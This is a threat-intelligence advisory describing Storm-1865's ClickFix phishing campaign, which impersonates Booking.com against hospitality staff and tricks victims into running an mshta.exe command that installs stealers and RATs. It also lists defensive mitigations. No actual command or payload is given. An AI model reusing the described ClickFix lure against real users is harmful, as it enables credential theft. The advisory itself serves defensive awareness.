Security Intelligence
Microsoft has identified an ongoing Storm-1865 phishing campaign targeting the hospitality industry by masquerading as Booking.com communications. Initiated in December 2024, this campaign leverages a social engineering tactic known as ClickFix to disseminate credential-stealing malware.
The attack begins with emails sent to hospitality professionals across regions including North America, Oceania, South and Southeast Asia, and Europe. These emails, falsely claiming to be from Booking.com, notify recipients of a supposed negative guest review and requests their feedback, including a link or PDF attachment that appears to direct to the legitimate Booking.com site.
Stay on top of emerging threats.
Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.
Upon clicking, victims are led to a counterfeit CAPTCHA verification page designed to resemble Booking.com's interface. This page employs the ClickFix technique, instructing users to open the Windows Run dialog, paste a command copied to their clipboard, and execute it. This command utilizes the legitimate mshta.exe utility to download and run malware payloads such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
Previously, Storm-1865 targeted e-commerce customers with phishing messages leading to fraudulent payment sites. The adoption of the ClickFix method signifies an evolution in their tactics to bypass traditional security measures.
Source: The Hacker News
Analysis
The ClickFix social engineering technique emerged as a notable cyber threat in early 2024. The clever technique, which involves deceiving users into executing malicious commands on their systems by presenting fake error messages or prompts, has been adopted by various cybercriminals and advanced persistent threat (APT) groups to distribute malware.
Among these groups, hackers belonging to Russia's Main Intelligence Directorate (GRU), known as APT28, have incorporated ClickFix into their operations. Similarly, MuddyWater, an Iranian cyber espionage group linked to Iran's Ministry of Intelligence and Security, has utilized ClickFix to enhance their malware distribution strategies.
The adoption of ClickFix by such sophisticated actors underscores its effectiveness in bypassing traditional security measures and highlights the evolving landscape of social engineering tactics in cyber espionage.
Mitigation
Field Effect’s Security Intelligence team constantly monitor the cyber threat landscape for threats related to phishing. This research contributes to the timely deployment of signatures into Field Effect MDR to detect and mitigate these threats. Field Effect MDR users are automatically notified when threat-related activity is detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect portal.
To detect and prevent ClickFix style attacks, Field Effect recommends that organizations and individuals implement email security protections, such as anti-phishing filters and domain verification (DMARC, DKIM, SPF), to help block phishing emails before they reach inboxes.
Restricting the execution of risky scripting tools like mshta.exe and wscript.exe through Group Policy or cybersecurity solutions that monitor endpoints like Field Effect MDR can also mitigate potential exploits. Keeping software updated, including operating systems, browsers, and security tools, helps patch vulnerabilities that attackers might use to gain access.
Additionally, enabling multi-factor authentication (MFA) can prevent unauthorized account access, even if credentials are stolen in a phishing attack. By combining strong user education with technical defenses, individuals and organizations can significantly reduce their risk of falling victim to this evolving phishing technique.
